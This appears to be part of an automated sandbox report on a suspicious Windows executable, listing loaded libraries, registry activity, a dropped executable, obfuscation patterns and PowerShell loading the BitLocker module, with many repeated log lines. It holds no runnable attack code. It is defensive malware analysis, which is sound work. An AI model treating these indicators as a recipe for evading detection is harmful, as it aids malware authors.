Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: ncrypt.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: ntasn1.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: dbghelp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: iertutil.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: windows.storage.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: wldp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: profapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: kernel.appcore.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: winhttp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: mswsock.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: iphlpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: winnsi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: urlmon.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: srvcli.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: netutils.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: dnsapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: rasadhlp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: fwpuclnt.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: schannel.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: mskeyprotect.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: msasn1.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: dpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: cryptsp.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: rsaenh.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: cryptbase.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: gpapi.dll
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Section loaded: ncryptsslp.dll

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: YYjRtxS70h.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: YYjRtxS70h.exe

Static file information: File size 13793970 > 1048576

Source: YYjRtxS70h.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: YYjRtxS70h.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:

Binary string: C:\Users\danie\source\repos\Qwest\Qwest\obj\Debug\Qwest.pdb source: YYjRtxS70h.exe

Binary contains a suspicious time stamp

Source: YYjRtxS70h.exe

Static PE information: 0x833F0DF3 [Tue Oct 11 12:07:15 2039 UTC]

PE file contains sections with non-standard names

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr

Static PE information: section name: .00cfg

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BE633D push eax; ret	10_2_04BE6351
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BE2CFF push 04B807BAh; retf	10_2_04BE2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 10_2_04BE2C5C push 04B807BAh; retf	10_2_04BE2CFE
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04B63A9B push ebx; retf	13_2_04B63ADA

Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe.0.dr

Static PE information: section name: .text entropy: 6.864188260151341

Drops PE files

Source: C:\Users\user\Desktop\YYjRtxS70h.exe

File created: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\VmTatwGQo\168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\YYjRtxS70h.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
